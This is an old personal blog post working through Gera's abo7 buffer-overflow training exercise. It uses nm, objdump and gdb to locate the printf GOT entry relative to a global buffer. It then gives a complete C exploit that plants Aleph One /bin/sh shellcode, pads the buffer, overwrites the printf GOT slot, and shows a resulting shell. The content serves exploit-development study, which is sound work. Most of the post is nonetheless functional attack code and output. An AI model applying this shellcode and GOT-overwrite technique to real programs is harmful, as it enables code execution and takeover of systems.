Wednesday, January 26, 2011

Advanced Buffer Overflow #7 Redux Redux 

[dennis@localhost abo8-2]$ nm -n abo8

...

08049600 B buf
08049700 A _end

On this system, when buf is in the BSS, we can't overwrite anything useful.

Instead, I'm using this post as a note to myself about overwriting GOT entries in abo7. I've appended a printf() to abo7.c.
/* abo7.c                                                  *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* sometimes you can,       *
 * sometimes you don't      *
 * that's what life's about */

char buf[256]={1};

int main(int argv,char **argc) {
        strcpy(buf,argc[1]);
        printf("printf me\n");
}

[dennis@localhost abo7-3]$ nm -n abo7

...

08049560 D buf
08049660 ? __EH_FRAME_BEGIN__
08049660 ? __FRAME_END__
08049660 d force_to_data
08049664 ? __CTOR_LIST__
08049668 ? __CTOR_END__
0804966c ? __DTOR_LIST__
08049670 ? __DTOR_END__
08049674 ? _GLOBAL_OFFSET_TABLE_

...

[dennis@localhost abo7-3]$ objdump -R abo7 | grep printf
0804968c R_386_JUMP_SLOT   printf

(gdb) x/x buf
0x8049560 :        0x00000001

(gdb) x/x 0x08049674
0x8049674 <_global_offset_table_>:      0x0804969c
(gdb) print /d 0x8049674 - 0x8049560
$2 = 276

(gdb) x/x 0x0804968c
0x804968c <_global_offset_table_+24>:   0x08048366
(gdb) x/x 0x08048366
0x8048366 <printf+6>:   0x00001868
(gdb) print /d 0x0804968c - 0x8049560
$3 = 300

GOT, 0x8049674, is 276 bytes away from buf and the printf entry, 0x0804968c is 300 bytes away.

Putting it together.
dennis@ipa:~/abo7-3$ cat exp.c7-3$ 1;2c
#include <stdio.h>
#include <string.h>

#define BUFLEN 304
#define VULN "./abo7"
/* hardcoded for simplicity, but need a better way to get this */
#define RET 0x8049560

char shellcode[] =
  /* aleph one shellcode */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main()
{
  char argv1[BUFLEN + 1];
  char *p;
  char *argv[] = { VULN, argv1, NULL };

  p = argv1;

  /* nops */
  memset(p, '\x90', 16);
  p += 16;

  /* shellcode */
  memcpy(p, shellcode, strlen(shellcode));
  p += strlen(shellcode);

  /* padding */
  memset(p, 'A', (BUFLEN - 16 - strlen(shellcode) - 4));
  p += (BUFLEN - 16 - strlen(shellcode) - 4);

  /* set printf got entry */
  *((void **)p) = (void *)RET;
  p += 4;

  *p = '\0';

  execve(argv[0], argv, NULL);
  return -1;
}

[dennis@localhost abo7-3]$ ./exp
sh-2.04$
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)